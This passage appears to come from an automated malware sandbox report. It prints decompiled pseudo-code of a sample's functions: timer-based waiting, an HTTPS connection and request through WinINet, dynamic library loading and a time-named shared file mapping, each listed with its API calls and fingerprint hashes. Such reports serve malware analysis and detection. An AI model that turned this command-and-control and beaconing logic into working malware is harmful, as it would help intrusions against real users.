                                                                                                                                  						_t71 = _v12;
                                                                                                                                  						_t58 = _t71 << 4;
                                                                                                                                  						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                                                  						_t72 = _t71 + 1;
                                                                                                                                  						_v24 = _t71 + 1;
                                                                                                                                  						_t60 = E022B2C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                                                                                                  						_v8.LowPart = _t60;
                                                                                                                                  						if(_t60 != 0) {
                                                                                                                                  							goto L17;
                                                                                                                                  						}
                                                                                                                                  						_t65 = _v24;
                                                                                                                                  						_v12 = _t65;
                                                                                                                                  						_t90 = _t65 - 3;
                                                                                                                                  						if(_t65 != 3) {
                                                                                                                                  							goto L6;
                                                                                                                                  						} else {
                                                                                                                                  							_v8.LowPart = E022B9870(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                                                  						}
                                                                                                                                  						goto L12;
                                                                                                                                  						L17:
                                                                                                                                  						__eflags = _t60 - 0x10d2;
                                                                                                                                  						if(_t60 != 0x10d2) {
                                                                                                                                  							_push(0xffffffff);
                                                                                                                                  							_push(0xff676980);
                                                                                                                                  							_push(0);
                                                                                                                                  							_push( *0x22bd244);
                                                                                                                                  							goto L21;
                                                                                                                                  						} else {
                                                                                                                                  							__eflags =  *0x22bd248; // 0x0
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								goto L12;
                                                                                                                                  							} else {
                                                                                                                                  								_t60 = E022B5433();
                                                                                                                                  								_push(0xffffffff);
                                                                                                                                  								_push(0xdc3cba00);
                                                                                                                                  								_push(0);
                                                                                                                                  								_push( *0x22bd248);
                                                                                                                                  								L21:
                                                                                                                                  								L022BAF6E();
                                                                                                                                  								_v36.LowPart = _t60;
                                                                                                                                  								_v32 = _t76;
                                                                                                                                  								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                  								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                  								_v8.LowPart = _t64;
                                                                                                                                  								__eflags = _t64;
                                                                                                                                  								if(_t64 == 0) {
                                                                                                                                  									goto L6;
                                                                                                                                  								} else {
                                                                                                                                  									goto L12;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L25:
                                                                                                                                  					}
                                                                                                                                  					L12:
                                                                                                                                  					_t78 =  &_v92;
                                                                                                                                  					_t70 = 3;
                                                                                                                                  					do {
                                                                                                                                  						_t54 =  *_t78;
                                                                                                                                  						if(_t54 != 0) {
                                                                                                                                  							HeapFree( *0x22bd238, 0, _t54);
                                                                                                                                  						}
                                                                                                                                  						_t78 =  &(_t78[4]);
                                                                                                                                  						_t70 = _t70 - 1;
                                                                                                                                  					} while (_t70 != 0);
                                                                                                                                  					CloseHandle(_v44);
                                                                                                                                  				}
                                                                                                                                  				return _v8;
                                                                                                                                  				goto L25;
                                                                                                                                  			}





























                                                                                                                                  APIs
                                                                                                                                  • memset.NTDLL ref: 022B7C52
                                                                                                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 022B7C5E
                                                                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 022B7C83
                                                                                                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 022B7C9F
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 022B7CB8
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 022B7D4E
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 022B7D5D
                                                                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 022B7D97
                                                                                                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,022B312C,?), ref: 022B7DAD
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 022B7DB8
                                                                                                                                    • Part of subcall function 022B5319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04779368,00000000,?,74E5F710,00000000,74E5F730), ref: 022B5368
                                                                                                                                    • Part of subcall function 022B5319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,047793A0,?,00000000,30314549,00000014,004F0053,0477935C), ref: 022B5405
                                                                                                                                    • Part of subcall function 022B5319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,022B7CCB), ref: 022B5417
                                                                                                                                  • GetLastError.KERNEL32 ref: 022B7DCA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3521023985-8415677
                                                                                                                                  • Opcode ID: f764c3117ddcf1b220336c60cf3e96b63639a292ad2fd4d21cf494876b5b30cc
                                                                                                                                  • Instruction ID: ef5569f68b2056e97f6cbf1d251b78ad26c94cf23f6e4be129f452d0a4fcd665
                                                                                                                                  • Opcode Fuzzy Hash: f764c3117ddcf1b220336c60cf3e96b63639a292ad2fd4d21cf494876b5b30cc
                                                                                                                                  • Instruction Fuzzy Hash: 86518E72C1122AAFDF129FD4DC489EEBFB9EF893A0F104A16F510A6184D7709650CFA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E022BA85C(void* __eax, void* __ecx, long __esi, char* _a4) {
                                                                                                                                  				void _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				void _v16;
                                                                                                                                  				void* _t34;
                                                                                                                                  				void* _t38;
                                                                                                                                  				void* _t40;
                                                                                                                                  				char* _t56;
                                                                                                                                  				long _t57;
                                                                                                                                  				void* _t58;
                                                                                                                                  				intOrPtr _t59;
                                                                                                                                  				long _t65;
                                                                                                                                  
                                                                                                                                  				_t65 = __esi;
                                                                                                                                  				_t58 = __ecx;
                                                                                                                                  				_v16 = 0xea60;
                                                                                                                                  				__imp__( *(__esi + 4));
                                                                                                                                  				_v12 = __eax + __eax;
                                                                                                                                  				_t56 = E022B1525(__eax + __eax + 1);
                                                                                                                                  				if(_t56 != 0) {
                                                                                                                                  					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                                                                                                                                  						E022B8B22(_t56);
                                                                                                                                  					} else {
                                                                                                                                  						E022B8B22( *(__esi + 4));
                                                                                                                                  						 *(__esi + 4) = _t56;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                                                                                                                                  				 *(_t65 + 0x10) = _t34;
                                                                                                                                  				if(_t34 == 0 || InternetSetStatusCallback(_t34, E022BA7F1) == 0xffffffff) {
                                                                                                                                  					L15:
                                                                                                                                  					return GetLastError();
                                                                                                                                  				} else {
                                                                                                                                  					ResetEvent( *(_t65 + 0x1c));
                                                                                                                                  					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
                                                                                                                                  					 *(_t65 + 0x14) = _t38;
                                                                                                                                  					if(_t38 != 0 || GetLastError() == 0x3e5 && E022B29C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                                                                                                                                  						_t59 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  						_t15 = _t59 + 0x22be743; // 0x544547
                                                                                                                                  						_v8 = 0x84c03180;
                                                                                                                                  						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed
                                                                                                                                  						 *(_t65 + 0x18) = _t40;
                                                                                                                                  						if(_t40 == 0) {
                                                                                                                                  							goto L15;
                                                                                                                                  						}
                                                                                                                                  						_t57 = 4;
                                                                                                                                  						_v12 = _t57;
                                                                                                                                  						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                                                                                                                                  							_v8 = _v8 | 0x00000100;
                                                                                                                                  							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                                                                                                                                  						}
                                                                                                                                  						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                                                                                                                                  							goto L15;
                                                                                                                                  						} else {
                                                                                                                                  							return 0;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						goto L15;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 022BA86E
                                                                                                                                    • Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531
                                                                                                                                  • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 022BA891
                                                                                                                                  • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 022BA8B9
                                                                                                                                  • InternetSetStatusCallback.WININET(00000000,022BA7F1), ref: 022BA8D0
                                                                                                                                  • ResetEvent.KERNEL32(?), ref: 022BA8E2
                                                                                                                                  • InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 022BA8F8
                                                                                                                                  • GetLastError.KERNEL32 ref: 022BA905
                                                                                                                                  • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 022BA94B
                                                                                                                                  • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 022BA969
                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 022BA98A
                                                                                                                                  • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 022BA996
                                                                                                                                  • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 022BA9A6
                                                                                                                                  • GetLastError.KERNEL32 ref: 022BA9B0
                                                                                                                                    • Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2290446683-0
                                                                                                                                  • Opcode ID: 948f27abbb02936741809f62946203336c014fadfc90f580af5de468ef8175b4
                                                                                                                                  • Instruction ID: e10a7e01ede8b418a81e7680ae86f0a499d76cfa5e6cb439dd6c036ed486709c
                                                                                                                                  • Opcode Fuzzy Hash: 948f27abbb02936741809f62946203336c014fadfc90f580af5de468ef8175b4
                                                                                                                                  • Instruction Fuzzy Hash: 7B419C71950605BFEB329FE1DC88EDB7ABDEF88744B104929F542D1094D731A510DE20
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                  			E022BAC95(long _a4, long _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				LONG* _v28;
                                                                                                                                  				long _v40;
                                                                                                                                  				long _v44;
                                                                                                                                  				long _v48;
                                                                                                                                  				CHAR* _v52;
                                                                                                                                  				long _v56;
                                                                                                                                  				CHAR* _v60;
                                                                                                                                  				long _v64;
                                                                                                                                  				signed int* _v68;
                                                                                                                                  				char _v72;
                                                                                                                                  				signed int _t76;
                                                                                                                                  				signed int _t80;
                                                                                                                                  				signed int _t81;
                                                                                                                                  				intOrPtr* _t82;
                                                                                                                                  				intOrPtr* _t83;
                                                                                                                                  				intOrPtr* _t85;
                                                                                                                                  				intOrPtr* _t90;
                                                                                                                                  				intOrPtr* _t95;
                                                                                                                                  				intOrPtr* _t98;
                                                                                                                                  				struct HINSTANCE__* _t99;
                                                                                                                                  				void* _t102;
                                                                                                                                  				intOrPtr* _t104;
                                                                                                                                  				void* _t115;
                                                                                                                                  				long _t116;
                                                                                                                                  				void _t125;
                                                                                                                                  				void* _t131;
                                                                                                                                  				signed short _t133;
                                                                                                                                  				struct HINSTANCE__* _t138;
                                                                                                                                  				signed int* _t139;
                                                                                                                                  
                                                                                                                                  				_t139 = _a4;
                                                                                                                                  				_v28 = _t139[2] + 0x22b0000;
                                                                                                                                  				_t115 = _t139[3] + 0x22b0000;
                                                                                                                                  				_t131 = _t139[4] + 0x22b0000;
                                                                                                                                  				_v8 = _t139[7];
                                                                                                                                  				_v60 = _t139[1] + 0x22b0000;
                                                                                                                                  				_v16 = _t139[5] + 0x22b0000;
                                                                                                                                  				_v64 = _a8;
                                                                                                                                  				_v72 = 0x24;
                                                                                                                                  				_v68 = _t139;
                                                                                                                                  				_v56 = 0;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v48 = 0;
                                                                                                                                  				_v44 = 0;
                                                                                                                                  				_v40 = 0;
                                                                                                                                  				if(( *_t139 & 0x00000001) == 0) {
                                                                                                                                  					_a8 =  &_v72;
                                                                                                                                  					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_t138 =  *_v28;
                                                                                                                                  				_t76 = _a8 - _t115 >> 2 << 2;
                                                                                                                                  				_t133 =  *(_t131 + _t76);
                                                                                                                                  				_a4 = _t76;
                                                                                                                                  				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                                                                                                  				_v56 = _t80;
                                                                                                                                  				_t81 = _t133 + 0x22b0002;
                                                                                                                                  				if(_t80 == 0) {
                                                                                                                                  					_t81 = _t133 & 0x0000ffff;
                                                                                                                                  				}
                                                                                                                                  				_v52 = _t81;
                                                                                                                                  				_t82 =  *0x22bd1a0; // 0x0
                                                                                                                                  				_t116 = 0;
                                                                                                                                  				if(_t82 == 0) {
                                                                                                                                  					L6:
                                                                                                                                  					if(_t138 != 0) {
                                                                                                                                  						L18:
                                                                                                                                  						_t83 =  *0x22bd1a0; // 0x0
                                                                                                                                  						_v48 = _t138;
                                                                                                                                  						if(_t83 != 0) {
                                                                                                                                  							_t116 =  *_t83(2,  &_v72);
                                                                                                                                  						}
                                                                                                                                  						if(_t116 != 0) {
                                                                                                                                  							L32:
                                                                                                                                  							 *_a8 = _t116;
                                                                                                                                  							L33:
                                                                                                                                  							_t85 =  *0x22bd1a0; // 0x0
                                                                                                                                  							if(_t85 != 0) {
                                                                                                                                  								_v40 = _v40 & 0x00000000;
                                                                                                                                  								_v48 = _t138;
                                                                                                                                  								_v44 = _t116;
                                                                                                                                  								 *_t85(5,  &_v72);
                                                                                                                                  							}
                                                                                                                                  							return _t116;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                                                                                                  								L27:
                                                                                                                                  								_t116 = GetProcAddress(_t138, _v52);
                                                                                                                                  								if(_t116 == 0) {
                                                                                                                                  									_v40 = GetLastError();
                                                                                                                                  									_t90 =  *0x22bd19c; // 0x0
                                                                                                                                  									if(_t90 != 0) {
                                                                                                                                  										_t116 =  *_t90(4,  &_v72);
                                                                                                                                  									}
                                                                                                                                  									if(_t116 == 0) {
                                                                                                                                  										_a4 =  &_v72;
                                                                                                                                  										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                                                                                                  										_t116 = _v44;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								goto L32;
                                                                                                                                  							} else {
                                                                                                                                  								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                                                                                                  								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                                                                                                  									_t116 =  *(_a4 + _v16);
                                                                                                                                  									if(_t116 != 0) {
                                                                                                                                  										goto L32;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								goto L27;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t98 =  *0x22bd1a0; // 0x0
                                                                                                                                  					if(_t98 == 0) {
                                                                                                                                  						L9:
                                                                                                                                  						_t99 = LoadLibraryA(_v60); // executed
                                                                                                                                  						_t138 = _t99;
                                                                                                                                  						if(_t138 != 0) {
                                                                                                                                  							L13:
                                                                                                                                  							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                                                                                                  								FreeLibrary(_t138);
                                                                                                                                  							} else {
                                                                                                                                  								if(_t139[6] != 0) {
                                                                                                                                  									_t102 = LocalAlloc(0x40, 8);
                                                                                                                                  									if(_t102 != 0) {
                                                                                                                                  										 *(_t102 + 4) = _t139;
                                                                                                                                  										_t125 =  *0x22bd198; // 0x0
                                                                                                                                  										 *_t102 = _t125;
                                                                                                                                  										 *0x22bd198 = _t102;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						_v40 = GetLastError();
                                                                                                                                  						_t104 =  *0x22bd19c; // 0x0
                                                                                                                                  						if(_t104 == 0) {
                                                                                                                                  							L12:
                                                                                                                                  							_a8 =  &_v72;
                                                                                                                                  							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                                                                                                  							return _v44;
                                                                                                                                  						}
                                                                                                                                  						_t138 =  *_t104(3,  &_v72);
                                                                                                                                  						if(_t138 != 0) {
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						goto L12;
                                                                                                                                  					}
                                                                                                                                  					_t138 =  *_t98(1,  &_v72);
                                                                                                                                  					if(_t138 != 0) {
                                                                                                                                  						goto L13;
                                                                                                                                  					}
                                                                                                                                  					goto L9;
                                                                                                                                  				}
                                                                                                                                  				_t116 =  *_t82(0,  &_v72);
                                                                                                                                  				if(_t116 != 0) {
                                                                                                                                  					goto L33;
                                                                                                                                  				}
                                                                                                                                  				goto L6;
                                                                                                                                  			}
                                                                                                                                  0x022badf0
                                                                                                                                  0x022badf8
                                                                                                                                  0x022badfa
                                                                                                                                  0x022badfd
                                                                                                                                  0x022bae03
                                                                                                                                  0x022bae05
                                                                                                                                  0x022bae05
                                                                                                                                  0x022badf8
                                                                                                                                  0x022badea
                                                                                                                                  0x00000000
                                                                                                                                  0x022bade4
                                                                                                                                  0x022bad9d
                                                                                                                                  0x022bada0
                                                                                                                                  0x022bada7
                                                                                                                                  0x022badb7
                                                                                                                                  0x022badba
                                                                                                                                  0x022badca
                                                                                                                                  0x00000000
                                                                                                                                  0x022badd0
                                                                                                                                  0x022badb1
                                                                                                                                  0x022badb5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022badb5
                                                                                                                                  0x022bad82
                                                                                                                                  0x022bad86
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bad86
                                                                                                                                  0x022bad5f
                                                                                                                                  0x022bad63
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 022BAD0E
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 022BAD8B
                                                                                                                                  • GetLastError.KERNEL32 ref: 022BAD97
                                                                                                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 022BADCA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                  • String ID: $
                                                                                                                                  • API String ID: 948315288-3993045852
                                                                                                                                  • Opcode ID: 3144815266b793fda642c52d46c06f8f18c0e525ae6c881aa5bc77262e15443b
                                                                                                                                  • Instruction ID: bdc72241182bb8936a1af42d0bb4a2daa15a2a7e96cc427fe8c54b147a859b42
                                                                                                                                  • Opcode Fuzzy Hash: 3144815266b793fda642c52d46c06f8f18c0e525ae6c881aa5bc77262e15443b
                                                                                                                                  • Instruction Fuzzy Hash: 50814A75A50206AFDB22CFD8D884BEEB7F4BF48350F108429E955E7244EB70E945CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E022B8E0D(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				struct _FILETIME* _v12;
                                                                                                                                  				short _v56;
                                                                                                                                  				struct _FILETIME* _t12;
                                                                                                                                  				intOrPtr _t13;
                                                                                                                                  				void* _t17;
                                                                                                                                  				void* _t21;
                                                                                                                                  				intOrPtr _t27;
                                                                                                                                  				long _t28;
                                                                                                                                  				void* _t30;
                                                                                                                                  
                                                                                                                                  				_t27 = __edx;
                                                                                                                                  				_t12 =  &_v12;
                                                                                                                                  				GetSystemTimeAsFileTime(_t12);
                                                                                                                                  				_push(0x192);
                                                                                                                                  				_push(0x54d38000);
                                                                                                                                  				_push(_v8);
                                                                                                                                  				_push(_v12);
                                                                                                                                  				L022BAF68();
                                                                                                                                  				_push(_t12);
                                                                                                                                  				_v12 = _t12;
                                                                                                                                  				_t13 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  				_t5 = _t13 + 0x22be87e; // 0x4778e26
                                                                                                                                  				_t6 = _t13 + 0x22be59c; // 0x530025
                                                                                                                                  				_push(0x16);
                                                                                                                                  				_push( &_v56);
                                                                                                                                  				_v8 = _t27;
                                                                                                                                  				L022BAC0A();
                                                                                                                                  				_t17 = CreateFileMappingW(0xffffffff, 0x22bd2ac, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                  				_t30 = _t17;
                                                                                                                                  				if(_t30 == 0) {
                                                                                                                                  					_t28 = GetLastError();
                                                                                                                                  				} else {
                                                                                                                                  					if(GetLastError() == 0xb7) {
                                                                                                                                  						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                  						if(_t21 == 0) {
                                                                                                                                  							_t28 = GetLastError();
                                                                                                                                  							if(_t28 != 0) {
                                                                                                                                  								goto L6;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							 *_a4 = _t30;
                                                                                                                                  							 *_a8 = _t21;
                                                                                                                                  							_t28 = 0;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t28 = 2;
                                                                                                                                  						L6:
                                                                                                                                  						CloseHandle(_t30);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t28;
                                                                                                                                  			}














                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,022B2FFF,?,?,4D283A53,?,?), ref: 022B8E19
                                                                                                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 022B8E2F
                                                                                                                                  • _snwprintf.NTDLL ref: 022B8E54
                                                                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,022BD2AC,00000004,00000000,00001000,?), ref: 022B8E70
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,022B2FFF,?,?,4D283A53), ref: 022B8E82
                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 022B8E99
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,022B2FFF,?,?), ref: 022B8EBA
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,022B2FFF,?,?,4D283A53), ref: 022B8EC2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1814172918-0
                                                                                                                                  • Opcode ID: c962e639b90d958decb2126f05e305b86d4ce56e5293b3b04b80be0b03573142
                                                                                                                                  • Instruction ID: ef968c233dda0f37a26a5b4f5180ea599a76e0f624cd60059b8bceee624aa15e
                                                                                                                                  • Opcode Fuzzy Hash: c962e639b90d958decb2126f05e305b86d4ce56e5293b3b04b80be0b03573142
                                                                                                                                  • Instruction Fuzzy Hash: F421C0BAE50204BFD713ABE8DC49FDE37A9AF44790F110521F609E6294D7B09504CB51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E022B58DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                                                                                                                  				void* _t17;
                                                                                                                                  				void* _t18;
                                                                                                                                  				void* _t19;
                                                                                                                                  				void* _t20;
                                                                                                                                  				void* _t21;
                                                                                                                                  				intOrPtr _t24;
                                                                                                                                  				void* _t37;
                                                                                                                                  				void* _t41;
                                                                                                                                  				intOrPtr* _t45;
                                                                                                                                  
                                                                                                                                  				_t41 = __edi;
                                                                                                                                  				_t37 = __ebx;
                                                                                                                                  				_t45 = __eax;
                                                                                                                                  				_t16 =  *((intOrPtr*)(__eax + 0x20));
                                                                                                                                  				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                                                                                                                                  					E022B29C0(_t16, __ecx, 0xea60);
                                                                                                                                  				}
                                                                                                                                  				_t17 =  *(_t45 + 0x18);
                                                                                                                                  				_push(_t37);
                                                                                                                                  				_push(_t41);
                                                                                                                                  				if(_t17 != 0) {
                                                                                                                                  					InternetSetStatusCallback(_t17, 0);
                                                                                                                                  					InternetCloseHandle( *(_t45 + 0x18)); // executed
                                                                                                                                  				}
                                                                                                                                  				_t18 =  *(_t45 + 0x14);
                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                  					InternetSetStatusCallback(_t18, 0);
                                                                                                                                  					InternetCloseHandle( *(_t45 + 0x14));
                                                                                                                                  				}
                                                                                                                                  				_t19 =  *(_t45 + 0x10);
                                                                                                                                  				if(_t19 != 0) {
                                                                                                                                  					InternetSetStatusCallback(_t19, 0);
                                                                                                                                  					InternetCloseHandle( *(_t45 + 0x10));
                                                                                                                                  				}
                                                                                                                                  				_t20 =  *(_t45 + 0x1c);
                                                                                                                                  				if(_t20 != 0) {
                                                                                                                                  					CloseHandle(_t20);
                                                                                                                                  				}
                                                                                                                                  				_t21 =  *(_t45 + 0x20);
                                                                                                                                  				if(_t21 != 0) {
                                                                                                                                  					CloseHandle(_t21);
                                                                                                                                  				}
                                                                                                                                  				_t22 =  *((intOrPtr*)(_t45 + 8));
                                                                                                                                  				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                                                                                                                                  					E022B8B22(_t22);
                                                                                                                                  					 *((intOrPtr*)(_t45 + 8)) = 0;
                                                                                                                                  					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                                                                                                                                  				}
                                                                                                                                  				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                  				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                                                                                                                  					E022B8B22(_t23);
                                                                                                                                  				}
                                                                                                                                  				_t24 =  *_t45;
                                                                                                                                  				if(_t24 != 0) {
                                                                                                                                  					_t24 = E022B8B22(_t24);
                                                                                                                                  				}
                                                                                                                                  				_t46 =  *((intOrPtr*)(_t45 + 4));
                                                                                                                                  				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                                                                                                                  					return E022B8B22(_t46);
                                                                                                                                  				}
                                                                                                                                  				return _t24;
                                                                                                                                  			}













                                                                                                                                  APIs
                                                                                                                                  • InternetSetStatusCallback.WININET(?,00000000), ref: 022B5909
